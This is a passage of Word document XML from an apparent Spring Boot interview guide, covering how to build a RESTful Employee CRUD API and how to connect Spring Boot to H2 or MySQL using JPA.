    </w:p>
    <w:p w14:paraId="3514CDF3" w14:textId="05C01508"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89" w:name="_Toc197867803"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you create a RESTful API in Spring Boot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="589"/>
    </w:p>
    <w:p w14:paraId="6CA8E5CF" w14:textId="2986D8C4" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F"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reate a </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RESTful API</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in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follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2685159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Set Up Spring Boot Project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A99D7C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set up a Spring Boot project using </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Initializr</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or by creating it manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF90281"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ia Spring Initializr</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE1F4B1"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Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="000108F2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Spring Initializr</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0074FE60"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hoose the following options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234F54B6"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aven Project (or Gradle if you prefer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3571878F"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anguage: Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6A5C31"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Boot: Select the latest stable version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5FA0DD"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etadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AB08B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roup: com.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D792FF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Artifact: restapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D30E885"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Name: restapi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58552A74"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564A92F5"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pendencies: Spring Web, Spring Boot DevTools, Spring Data JPA (Optional for database interaction)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F4B3A6"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lastRenderedPageBreak/>
        <w:t>Manually</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Create a Maven/Gradle project with dependencies for Spring Boot, Spring Web, and other necessary dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179C975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Add Dependencies in pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D66824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f you chose to set up manually, ensure the following dependencies are included in the pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0B4F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04A18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59150E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2D8845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675A7D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58443E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database interaction --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2D3F6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78E6D18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4A01D4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433C817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340C83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working with databases --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674CDE9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B03F1B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315CE66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5400C17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3C0B7C6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FAF4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239959BD"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a Model Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D147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class represents the data that your API will expose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DBB2A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model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B611087" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C3C1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71E0E0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5B22761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5419F40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02B47570" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6009ED9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77EC20D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8B4629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a Controller Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B374B8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e controller defines the RESTful API endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1359E3A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controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7FFEBE" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5CC73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restapi.model.Employee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5154780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08E8575" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A2A13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ArrayList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F67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52133B6D" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DBAB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74458A3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api/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD55E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Controller {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56886676" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CF943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ist&lt;Employee&gt; employees = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7693B2" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0CDB9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reate a new employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B513E7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36D5684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40EC6A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add(employee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E80AD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21F41AC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CB4A4EE" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2928075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ll employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAF70D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    @GetMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0889FF0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10A0F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FBDF0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EA85952" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B77A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 specific employee by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58041D7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30EB697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getEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523926F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stream().filter(e -&gt; e.getId().equals(id)).findFirst().orElse(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759972F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ADBD994" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F36BBA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Update employee details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C930E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tMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6531D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updateEmployee(@PathVariable Long id, @RequestBody Employee employeeDetails) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B35893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 employee = employees.stream().filter(e -&gt; e.getId().equals(id)).findFirst().orElse(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE4F8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f (employee != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9E0FF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Name(employeeDetails.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D73E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Department(employeeDetails.getDepartment());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C83220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DBC7FF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43860D7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8BF1C8C" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B6CE9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Delete an employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1F9B3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2D92879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ring deleteEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69677F7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removeIf(e -&gt; e.getId().equals(id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429113F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 with ID " + id + " deleted.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B8364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008626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5CB39388"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the Application Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702FB6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is the main class to run your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716FA7A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63800CAE" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42736D0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SpringApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612A0B5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autoconfigure.SpringBootApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25010C9A" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344D322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BootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108AFE6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RestApiApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4F952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atic void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1904A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SpringApplication.run(RestApiApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D4699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E28C8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22371C3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Run the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37427B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you have created the necessary classes, you can run your Spring Boot application by executing the main class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7A018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F991A11"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Testing the API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F89D45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test your RESTful API using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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A40977"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510BD77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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E55199D"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31C476C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OST http://localhost:8080/api/employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D627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7188706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A4E4B6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 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AFC30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19D8B84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2A218CFA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642A13DB"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 specific employee by ID</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D48ABE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id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F678C2"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UT update employee details</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35836FC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UT http://localhost:8080/api/employees/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E644C8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38D8E76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433419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ane Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6968B8"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Marketing"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE353B3"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4F0EF9C8"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0C913BF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DELETE http://localhost:8080/api/employees/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB5F8BA"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Optional Enhancements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7213BF6C"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atabase Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use JPA or Spring Data JPA to persist the data in a database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA399DA"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alidation</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Add @Valid annotations and validation constraints (e.g., @NotNull, @Size) to the model class to validate incoming data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715237B4"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Exception Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Implement global exception handling using @ControllerAdvice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2FE9CD"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Security</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Add Spring Security to handle authentication and authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B294F97"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1ADF1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513" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2D4BF" w14:textId="0918CFB2" w:rsidR="005B44BF" w:rsidRPr="00CE4B95" w:rsidRDefault="005B44BF" w:rsidP="005B44BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="590" w:name="_Toc197867804"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you connect Spring Boot with a database (JPA/Hibernate)?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="590"/>
    </w:p>
    <w:p w14:paraId="10936EF8" w14:textId="4492AB5A" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D"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onnect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follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0314E2EF"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Add Dependencies in pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53529F3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irst, add the necessary dependencies to your pom.xml file. These include </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JDBC Driver</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for your database (e.g., H2, MySQL, PostgreSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B2401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851BE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Web --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F3B5D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A939B6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BBE5F6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415F55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16F44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937FD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Data JPA --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499C4D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C511AE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E82DD5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1D7284B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4D5A0ABD" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125ADF9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H2 Database (or replace with MySQL, PostgreSQL, etc.) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434038B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1CB7E7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46BEB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1CCC35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6126B8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257455F7" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B12A0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for Testing --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F4CD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E5345A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BA3A29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test&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA2021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test&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3536971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A4E9DA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501E8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For other databases (e.g.,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 you would replace the H2 dependency with the relevant JDBC driver, like so:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3538CDE0" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3EDB4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096FD30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mysql&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22001E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mysql-connector-java&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E608B"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661AA3B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2706860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4051AF3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postgresql&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC7D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postgresql&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1216E113"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12C55EF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Configure application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D8BAA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t the database connection properties in the src/main/resources/application.properties (or application.yml).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7DE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Here’s an example for </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>H2</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228AC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H2 Database Configuration (for in-memory DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7D882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h2:mem:testdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DD64D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org.h2.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F732F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sa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E6AB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password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4348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H2Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C35CA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569478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18D676A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you would use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76920B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MySQL Database Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE167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mysql://localhost:3306/your_database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713C69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com.mysql.cj.jdbc.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AAD0D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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7519C68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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E30D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MySQL8Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39803E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07DDE37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666B4E8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the JPA Entity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF66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model class annotated with @Entity. This class will be mapped to a table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF3B39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model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3CB297" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9C40C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Entity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E81F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Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727DA3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edValue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F152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ionType;</w:t>
